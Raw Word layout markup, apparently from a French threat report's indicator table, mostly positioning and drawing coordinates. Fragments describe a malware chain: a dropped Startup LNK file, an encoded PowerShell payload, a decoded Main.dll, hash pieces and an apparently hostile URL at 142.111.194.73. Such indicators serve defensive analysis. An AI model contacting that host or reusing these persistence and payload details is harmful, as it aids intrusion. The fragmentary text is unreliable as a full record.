            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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11a79a020eface0a73808e38c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510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3151770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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abe093fa53e9808884a252cc0a0947e4b4a30f1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612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3247413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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71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3247413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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817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3328300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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399caf128d1fbebc784871d57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920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3688738</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062363" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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3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Fichier LNK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déposé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022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3700410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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05e131555faabae0960f0527cfb72d2b8e2381f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124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3796053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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227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3876940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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d0fde22b0b4e2b365c7faf445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3296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3879480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1816677" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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66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Startup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: </w:t>
                        </w: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ThJRq_6uEj.lnk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432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4264925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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420f1931af9b3f7d02c5edfc78eb69abdad6e71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5344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4270598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2004894" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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489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636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4361203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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739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4441455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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d2c3e9b81f9cbc3823a503654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841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4467248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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944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4988825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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dc4c906e56ecb446cbb10b227e1fb470e428108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04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4996203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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148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4996203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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251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5165355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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584678314533d80e52a2b9b30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353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5519685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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6b7e3dd5af5a56dd24e96c5b13282ad084c78d0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456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5522860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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Powershell (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="-14"/>
                          </w:rPr>
                          <w:t xml:space="preserve">WC3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, 93663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55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5615328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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660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5696215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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a589d5e4c1b6ba58b4525d9a8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763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5705498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454681" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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6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octets)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865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6056653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062998" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Charge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utile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 "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sub-encodée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"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968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6068325</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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3006a6639eff677b08595927cf219a3bcd5fdd0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07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6163968</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="46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172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6244855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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2bfd592606316bfd4623bb902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275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6247395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1017241" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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24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wt1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0x48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377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6620140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2100357" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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35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Main.dll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décodée depuis </w:t>
                        </w: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wt1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0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6794765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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78538f945a1d20aa392f3065f222223a4ed4728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582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6802778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260938" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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9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6848" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6555384</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6802778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113903" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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9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78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6891043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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889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6970025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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https://142.111.194.73:86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992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6971295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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4abfafa8c135bdfd9eacef222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094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7149730</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1157576" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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757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40/dj5FZEiLnA/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196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7510168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2062363" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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3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Fichier LNK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déposé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299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7610105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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0a9bc91e7ea2c3931f662eea37c00c7c26c8996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4016" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6555613</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7703843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="113675" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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5040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7702138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="607783" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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7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Startup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60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7705748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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708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7786635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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b65f6f7afe6cce8f6114f94b6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811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7892680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1339919" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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991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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">x3U</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle34"/>
                            <w:spacing w:val="10"/>
                          </w:rPr>
                          <w:t xml:space="preserve">F_q1KeVOd3</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle30"/>
                            <w:spacing w:val="49"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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913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8262885</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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cbe89fda7f44265ebc0cf7a0300a3ca5d682251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0160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8268558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2004894" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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489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11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8359163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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220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8439415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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61c22a29ff196d85b8ca12962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323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8465208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="346714" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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425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8986785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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efeac2aa183051eaad9c092c273488c9d4bff82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528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8994163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="555984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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630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8994163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="757292" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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732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9163315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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00b8b16952a4e68f10f0eda2d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835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7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93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7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1040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7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114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7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1244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7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91552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351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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51155">
                          <a:moveTo>
                            <a:pt x="3670299" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="35115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51155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="35115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596264" y="35115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5238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1342399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5727065" cy="8270875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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8270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8270875">
                          <a:moveTo>
                            <a:pt x="3670299" y="8270875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="8270875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="8270875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="8270875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="8270875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="8270875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="8270875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="8270875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7564119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="8270875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="7563484"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7563484"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="7563484"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="7563484"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7563484"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="7563484"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="7563484"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7563484"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7000239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7563484"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6999604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6999604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6999604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6999604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6999604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6999604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6999604"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6999604"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6292850"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6999604"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="6292215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="6292215"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="6292215"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="6292215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="6292215"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="6292215"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6292215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="6292215"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5585460"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6292215"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="5584824"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="5584824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="5584824"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="5584824"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="5584824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="5584824"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5584824"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="5584824"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4878070"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5584824"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4877434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4877434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4877434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4877434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4877434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4877434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4877434"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4877434"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4315459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4877434"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="4314825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="4314825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="4314825"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="4314825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="4314825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="4314825"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4314825"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="4314825"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3572509"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4314825"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="3571875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="3571875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="3571875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="3571875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="3571875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="3571875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3571875"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="3571875"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2684780"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3571875"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="2684145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="2684145"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="2684145"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="2684145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="2684145"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="2684145"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2684145"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="2684145"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1977390"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2684145"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1976754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1976754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1976754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1976754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1976754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1976754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1976754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1976754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1270000"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1976754"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="1269364"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="1269364"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3670299" y="1269364"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="1269364"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="1269364"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596900" y="1269364"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1269364"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="1269364"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="596264" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="562609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1269364"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3670299" y="561975"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="56197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561975"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="561975"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3669664" y="56197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561975"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="561975"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="596264" y="56197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56197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55456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351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="47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51155">
                          <a:moveTo>
                            <a:pt x="3670299" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5727065" y="35115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51155"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="596900" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
